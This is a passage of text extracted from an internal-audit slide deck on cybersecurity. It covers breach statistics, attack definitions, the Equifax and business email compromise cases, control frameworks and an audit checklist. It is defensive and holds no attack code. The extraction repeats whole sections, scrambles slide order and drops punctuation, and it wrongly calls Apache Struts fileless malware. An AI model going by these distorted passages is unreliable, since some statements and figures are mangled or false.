bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
